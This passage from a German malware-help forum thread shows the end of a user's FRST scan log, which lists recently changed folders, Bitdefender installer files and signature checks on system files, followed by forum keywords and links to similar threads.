2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-19 15:19

==================== Ende von FRST.txt ============================
         

Antwort

Themen zu Trojaner, Adware oder sonstiges ?
adware, browser, computer, firefox, flash player, homepage, installation, internet, mozilla, object, pop ups, problem, prozesse, realtek, registry, scan, software, svchost.exe, system, teamspeak, trojaner, trojaner board, usb, windows, wiso



Ähnliche Themen: Trojaner, Adware oder sonstiges ?


  1. rootkit oder sonstiges vllt aufn Rechner ? wer kann helfen ?
    Log-Analyse und Auswertung - 22.08.2016 (1)
  2. Attention Required! Virus oder sonstiges?
    Plagegeister aller Art und deren Bekämpfung - 15.10.2015 (22)
  3. Virus oder sonstiges der Werbung zuschaltet?
    Plagegeister aller Art und deren Bekämpfung - 25.11.2014 (2)
  4. Virus oder sonstiges.
    Log-Analyse und Auswertung - 18.08.2014 (3)
  5. Trojaner gefunden TR/Dldr.Agent.314440 und verschiedene Adwares ADWARE/EoRezo.AF, ADWARE/Adware.Gen7, ADWARE/AgentCV.A.2919
    Log-Analyse und Auswertung - 02.05.2014 (19)
  6. Frage zu Adware (oder doch Trojaner?)
    Plagegeister aller Art und deren Bekämpfung - 08.04.2014 (6)
  7. Virus oder sonstiges greift vermutlich System 32 an
    Plagegeister aller Art und deren Bekämpfung - 05.03.2011 (62)
  8. Habe ich einen Virus oder Malware oder sonstiges auf dem Rechner?
    Log-Analyse und Auswertung - 15.08.2010 (23)
  9. Habe Vieren oder sonstiges
    Log-Analyse und Auswertung - 02.08.2010 (23)
  10. Abstürze und evt. Viren,Trojaner oder Sonstiges, --> Bitte Hilfe!!!
    Plagegeister aller Art und deren Bekämpfung - 08.04.2010 (7)
  11. Glaube wurde Opfer von Spyware,Trojaner,Malerware oder Sonstiges!
    Log-Analyse und Auswertung - 21.02.2010 (9)
  12. Rootkit oder Sonstiges auf dem PC?
    Log-Analyse und Auswertung - 20.02.2010 (2)
  13. Trojaner oder sonstiges über Messenger (wcoredg.exe)
    Plagegeister aller Art und deren Bekämpfung - 19.02.2010 (3)
  14. Gute und schlechte Anti - Viren/Spyware/Adware/Sonstiges Software
    Antiviren-, Firewall- und andere Schutzprogramme - 03.03.2009 (5)
  15. trojaner und sonstiges
    Plagegeister aller Art und deren Bekämpfung - 10.12.2008 (2)
  16. hab ich Trojaner/adware/spyware oder sonstiges?
    Mülltonne - 16.03.2007 (0)
  17. Ich hab folgende trojaner oder adware oder was auch immer gefunden!
    Log-Analyse und Auswertung - 23.07.2006 (15)

Zum Thema Trojaner, Adware oder sonstiges ? - Hallo Trojaner Board, nach langem googeln bin ich auf eure Seite gestoßen. Ich habe gesehen das ihr schon einigen Usern geholfen habt. Ich bin sicher das mein Rechner mit irgendwas - Trojaner, Adware oder sonstiges ?...
Archiv
Du betrachtest: Trojaner, Adware oder sonstiges ? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.